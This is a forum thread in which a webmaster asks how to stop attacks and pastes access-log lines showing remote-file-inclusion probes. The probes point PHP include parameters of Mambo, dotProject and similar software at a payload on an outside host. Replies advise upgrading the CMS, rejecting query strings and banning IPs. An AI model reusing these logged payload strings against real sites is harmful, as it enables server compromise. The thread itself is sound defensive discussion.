Forum Moderators: coopster
This morning I have discovered someone has tried to exploit my site. The information is below.. my index.php file contains a flash file which has a form, the PHP for which is in a separate file named 'feedback.php.
Basically I want to stop these exploits and I wonder how I can do it? I have asked on a few forums but nothing is working! It seems I need to somehow restrict access or redirect bad requests.. please help I can;t afford to be blacklisted for this..
Many Thanks
Code: ( text )
209.3.11.x - - [20/May/2008:01:14:38 +0200] "GET /admin/business_inc/saveserver.php? thisdir=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
209.3.11.x - - [20/May/2008:01:14:38 +0200] "GET /dotproject/includes/db_adodb.php? baseDir=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
209.3.11.x - - [20/May/2008:01:14:39 +0200] "GET /interact/modules/forum/embedforum.php? CONFIG[LANGUAGE_CPATH]=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
209.3.11.x - - [20/May/2008:01:14:40 +0200] "GET /saveserver.php? thisdir=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
209.3.11.x - - [20/May/2008:01:14:41 +0200] "GET /index.php? page=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 200 4008
209.3.11.x - - [20/May/2008:01:14:41 +0200] "GET /index.php? x=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 200 4008
65.36.241.x - - [20/May/2008:02:02:09 +0200] "HEAD / HTTP/1.1" 200 0
81.80.12.x - - [20/May/2008:02:18:13 +0200] "GET / HTTP/1.0" 200 3983
209.3.11.x - - [20/May/2008:02:22:02 +0200] "GET /mambo/index.php? _REQUEST[option]=com_content& _REQUEST[Itemid]=1& GLOBALS=& mosConfig_absolute_path=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
209.3.11.x - - [20/May/2008:02:22:02 +0200] "GET /index.php? _REQUEST[option]=com_content& _REQUEST[Itemid]=1& GLOBALS=& mosConfig_absolute_path=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 200 4008
209.3.11.x - - [20/May/2008:02:22:03 +0200] "GET /index2.php? _REQUEST[option]=com_content& _REQUEST[Itemid]=1& GLOBALS=& mosConfig_absolute_path=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
209.3.11.x - - [20/May/2008:02:22:03 +0200] "GET /mambo/index2.php? _REQUEST[option]=com_content& _REQUEST[Itemid]=1& GLOBALS=& mosConfig_absolute_path=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
65.36.241.x - - [20/May/2008:03:03:55 +0200] "HEAD / HTTP/1.1" 200 0
209.3.11.x - - [20/May/2008:03:13:48 +0200] "GET /phplive/help.php? css_path=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
209.3.11.x - - [20/May/2008:03:13:49 +0200] "GET /webcalendar/tools/send_reminders.php? includedir=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
[edited by: jatar_k at 9:11 pm (utc) on May 20, 2008]
[edit reason] no specific ips thanks [/edit]
Welcome to WebmasterWorld. Are you running an old version of Mambo? Its going to be hard for anyone here to debug the problem from the code you posted. I would recommend you upgrade your system to the latest version of Joomla (originally Mambo) or try another CMS.
CMS are renowned for having security issues.
dc
<?php
if ( isset($_SERVER["QUERY_STRING"] ) && $_SERVER["QUERY_STRING"] > ' ' )
{
unset( $_SERVER["QUERY_STRING"] );
header("HTTP/1.0 400 Bad Request");
exit;
}
I found that the "empty" $_SERVER["QUERY_STRING"] is actually a space..
Hope this helps!
Are these just attempts at hacking your scripts or are you certain they are working? If your applications are as secure as possible and correctly written then there is little else you can do. As stated above, you can redirect if a query string is present if you don't need any, or you can ban the IPs that are attacking you, which the latter I would do anyway.
